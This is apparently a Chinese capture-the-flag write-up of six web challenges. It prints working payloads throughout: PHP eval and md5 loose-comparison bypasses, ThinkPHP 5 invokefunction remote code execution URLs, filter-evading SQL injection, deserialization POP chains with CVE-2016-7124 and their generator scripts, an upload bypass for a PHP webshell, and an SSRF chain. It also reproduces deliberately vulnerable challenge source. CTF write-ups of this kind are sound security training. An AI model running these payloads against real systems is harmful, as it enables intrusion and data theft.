目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power!
挑了部分题,太简单的就没选进来(但选进来≠有难度)
①webdog1__start
进来没啥东西,右键查看源码
对于 0e215962017,它的 md5 值同样是 "0e" 开头的纯数字串:PHP 的松散比较 == 会把两个形如 0e<数字> 的字符串都当作数值 0,所以 md5($web) == $web 这类比较(推测源码就是这么写的)会成立
?web=0e215962017
跳转到/start.php
没啥信息,这里bp抓包看响应头发现hint
访问/f14g.php
继续抓包发现hint(意义何在????)
访问/F1l1l1l1l1lag.php
/F1l1l1l1l1lag.php?get=system('ls');
因为 get 参数有长度限制,所以把 get 写成 eval($_GET[1]);,真正的命令放到不受限的第二个参数 1 里转接执行
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac flag.php');
回显
就是说flag在/flag里呗
/F1l1l1l1l1lag.php?get=eval($_GET[1]);&1=system('tac /flag');
拿到flag
②ez_rce
进来先灵魂发问
懒得扫目录了,直接访问/robots.txt
访问/NSS/index.php/
惊了!!是TP5!!
直接检索 thinkphp5 漏洞原理分析合集——下面用的 ?s=index/think\app/invokefunction&function=call_user_func_array 就是 ThinkPHP 5.0.x 的 invokefunction 远程代码执行,可以反射调用任意函数
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /flag/flag
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag/flag
均无回显
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=printenv
看环境变量
前面对 /flag 的 ls/tac 都没有回显,确定 flag 不在 /flag 这个路径下,所以改用 find 全盘搜
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag*
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /nss/ctf/flag/flag /flag /flag
拿到flag
或者其实这类框架漏洞利用的题都是有相应工具能梭的()
③ez_sql
提示用post传参
简单测了一下:空格被过滤,用 /**/ 内联注释代替;union、or、and 会被单次替换为空,双写(ununionion、oorr、aandnd)即可绕过。注意 information_schema 里也含 or,所以要写成 infoorrmation_schema
nss=1'/**/oorrder/**/by/**/4#
nss=999'/**/ununionion/**/select/**/1,2,3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aandnd/**/table_name='NSS_tb'),3#
999'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t,flll444g)/**/from/**/NSS_tb),3#
④ez_1zpop
<?php
// Challenge source (ez_1zpop). Deliberately vulnerable: unserialize() on a
// raw GET parameter lets the client choose the object graph, and the magic
// methods below chain into an arbitrary function call (fin::fmm).
error_reporting(0);
// Harmless sink: what lt::$impo holds after __construct / __wakeup.
class dxg
{function fmm(){return "nonono";}
// lt::__destruct echoes $this, which invokes __toString; __toString calls
// $impo->fmm() once the md5 check passes. __construct and __wakeup both
// overwrite $impo with a dxg, so a payload must avoid __wakeup (the
// writeup's final payload does so by declaring a wrong property count).
// md5($md51) == md5($md52) is a loose comparison: two different strings
// whose digests both have the form 0e<digits> compare equal as numeric 0.
}class lt
{public $impo='hi';public $md51='weclome';public $md52='to NSS';function __construct(){$this->impo = new dxg;}function __wakeup(){$this->impo = new dxg;return $this->impo->fmm();}function __toString(){if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm();}function __destruct(){echo $this;}
// Gadget: fmm() calls the function named by $a with $title as its only
// argument, e.g. a='system', title='tac /flag'.
}class fin
{public $a;public $url = 'https://www.ctfer.vip';public $title;function fmm(){$b = $this->a;$b($this->title);}
// Untrusted deserialization of $_GET['NSS']; the object is never used, but
// its destructor still runs when the script ends.
}if (isset($_GET['NSS'])) {$Data = unserialize($_GET['NSS']);
} else {highlight_file(__file__);
}
这个甚至不用搓链子,只要绕过 __wakeup 就可以:__wakeup 会把 impo 重置回 dxg,绕过方法是把序列化串里 lt 的属性个数改得比实际大(3 改成 4,即 CVE-2016-7124,只对 PHP < 5.6.25 / < 7.0.10 有效)
(__destruct 里的 echo $this 会触发 __toString;__toString 在 md5 松散比较通过后调用 $this->impo->fmm(),把 impo 换成 fin 对象后,fmm 就是 $a($title),即 system('tac /flag'))
构造
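// Build the lt -> fin chain: lt::__destruct echoes $this, __toString calls
// $impo->fmm(), and fin::fmm() does $a($title) -- here system('tac /flag').
$fin = new fin();
$fin->a = 'system';
$fin->title = 'tac /flag';

$chain = new lt();      // __construct sets impo = new dxg; overwritten below
$chain->impo = $fin;
// Two different strings whose md5 digests both look like 0e<digits>, so
// md5($md51) == md5($md52) passes the loose comparison while $md51 != $md52.
$chain->md51 = 's878926199a';
$chain->md52 = 's155964671a';

$payload = serialize($chain);
// Skip lt::__wakeup (which would reset impo back to dxg): declare one
// property more than the object really carries (CVE-2016-7124, only honoured
// by PHP < 5.6.25 / < 7.0.10). This yields the final payload directly
// instead of requiring a manual 3 -> 4 edit.
$payload = preg_replace('/^O:2:"lt":3:/', 'O:2:"lt":4:', $payload, 1);
echo $payload;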
最终 payload(把上面脚本输出的 O:2:"lt":3: 手动改成 O:2:"lt":4:,让属性个数与实际不符以跳过 __wakeup):
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"tac /flag";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}
⑤file_master
进来页面可以读文件可以传文件
?filename=index.php看源码
MIME检测,文件头检测,文件内容检测
改Content-Type: image/jpeg
文件头(XBM 图片格式的头,getimagesize 之类的文件头检测会把它识别为图片):
#define height 1
#define width 1
php 代码用短标签(<?= ... ?> 或 <? ... ?>)写即可,绕过对 <?php 的内容检测;前提是目标开启了 short_open_tag
访问 /upload/hggmm3ekc10fc6arlp5d03oamr/yjh3.php
下略
⑥Power!
右键查看源码发现提示
?source=index.php
看index.php源码
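<?php
// Challenge source as shown by ?source=index.php, reformatted from the
// one-line paste (which also lost the line break after the "//flag in
// /flag.php" comment, commenting out the rest of the file). Deliberately
// vulnerable: unserialize() of a client-supplied path_info plus an internal
// curl() fetch gives SSRF to 127.0.0.1, and image_path is a raw file read.
class FileViewer
{
    public $black_list = "flag";
    public $local = "http://127.0.0.1/";
    public $path;

    // Any call to an undefined method (e.g. ->c() from Backdoor::__destruct)
    // lands here and turns into loadfile().
    public function __call($f, $a)
    {
        $this->loadfile();
    }

    // Fetches $local.$path through curl and emits it as a base64 <img>.
    // Only $path is checked against $black_list; $local is trusted as-is.
    public function loadfile()
    {
        if (!is_array($this->path)) {
            if (preg_match("/".$this->black_list."/i", $this->path)) {
                $file = $this->curl($this->local."cheems.jpg");
            } else {
                $file = $this->curl($this->local.$this->path);
            }
        } else {
            $file = $this->curl($this->local."cheems.jpg");
        }
        echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
    }

    // Plain GET of $path, body returned as a string; no scheme or host
    // restriction, so anything reachable from the server can be fetched.
    public function curl($path)
    {
        $url = $path;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }

    // Resets $local on unserialize, so a payload cannot set it directly;
    // anything that writes $local after this point (a destructor) still wins.
    public function __wakeup()
    {
        $this->local = "http://127.0.0.1/";
    }
}

class Backdoor
{
    public $a;
    public $b;
    public $superhacker = "hacker.jpg";

    // Arbitrary property write: $i->$j = $superhacker.
    public function goodman($i, $j)
    {
        $i->$j = $this->superhacker;
    }

    // Runs when the object is freed, i.e. after __wakeup, so writing
    // FileViewer::$local here survives the reset; ->c() then hits __call.
    public function __destruct()
    {
        $this->goodman($this->a, $this->b);
        $this->a->c();
    }
}

if (isset($_GET['source'])) {
    highlight_file(__FILE__);
} else {
    if (isset($_GET['image_path'])) {
        $path = $_GET['image_path']; //flag in /flag.php
        // Only a scheme blacklist; plain paths such as flag.php are read directly.
        if (is_string($path) && !preg_match("/http:|gopher:|glob:|php:/i", $path)) {
            echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
        } else {
            echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
        }
    } else if (isset($_GET['path_info'])) {
        // Untrusted deserialization; the root object is used immediately, so
        // it must be a FileViewer, while other objects in the graph get their
        // destructors run later.
        $path_info = $_GET['path_info'];
        $FV = unserialize(base64_decode($path_info));
        $FV->loadfile();
    } else {
        $path = "vergil.jpg";
        echo '<h2>POWER!!</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
    }
}
?>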
?image_path=flag.php
点开echo的链接
flag被放在了 127.0.0.1:65500 ,外网无法访问
看来要用SSRF了
搓链子
FileViewer(外层,带一个动态属性) -> Backdoor::__destruct():先 goodman() 把内层 FileViewer 的 local 改写成 http://127.0.0.1:65500/(此时 __wakeup 的重置已经发生,所以改写会生效),再 $this->a->c() -> FileViewer::__call() -> FileViewer::loadfile() -> FileViewer::curl()
注意程序在 unserialize 之后会立刻调用 $FV->loadfile();如果 $FV 是 Backdoor 而不是 FileViewer 实例,就会因调用未定义方法而致命报错,Backdoor 的 __destruct 也就不会按预期执行
解决方法就是再实例化一个 FileViewer 对象,把 Backdoor 塞进这个对象的某个属性里(PHP 反序列化时会把类里没有声明的属性作为动态属性挂到对象上,所以 test 这个不存在的属性也能带进去)
构造
<?php
// Stub declarations carrying only the properties the payload needs.
// black_list is left out on purpose so the server-side default ("flag")
// remains in effect after unserialize().
class FileViewer
{
    public $local = "http://127.0.0.1:65500/";
    public $path = '';
}

class Backdoor
{
    public $a;
    public $b;
    public $superhacker;
}

$target = 'http://127.0.0.1:65500/';

// Inner FileViewer: Backdoor::__destruct rewrites its $local through
// goodman() and then calls ->c(), which __call turns into loadfile().
$inner = new FileViewer();

$door = new Backdoor();
$door->a = $inner;
$door->b = 'local';
$door->superhacker = $target;

// The root object must be a FileViewer so the target's own $FV->loadfile()
// call succeeds; the Backdoor rides along in a dynamic property.
$outer = new FileViewer();
$outer->test = $door;

echo base64_encode(serialize($outer));
payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czo1OiJsb2NhbCI7czoyMzoiaHR0cDovLzEyNy4wLjAuMTo2NTUwMC8iO3M6NDoicGF0aCI7czowOiIiO3M6NDoidGVzdCI7Tzo4OiJCYWNrZG9vciI6Mzp7czoxOiJhIjtPOjEwOiJGaWxlVmlld2VyIjoyOntzOjU6ImxvY2FsIjtzOjIzOiJodHRwOi8vMTI3LjAuMC4xOjY1NTAwLyI7czo0OiJwYXRoIjtzOjA6IiI7fXM6MToiYiI7czo1OiJsb2NhbCI7czoxMToic3VwZXJoYWNrZXIiO3M6MjM6Imh0dHA6Ly8xMjcuMC4wLjE6NjU1MDAvIjt9fQ==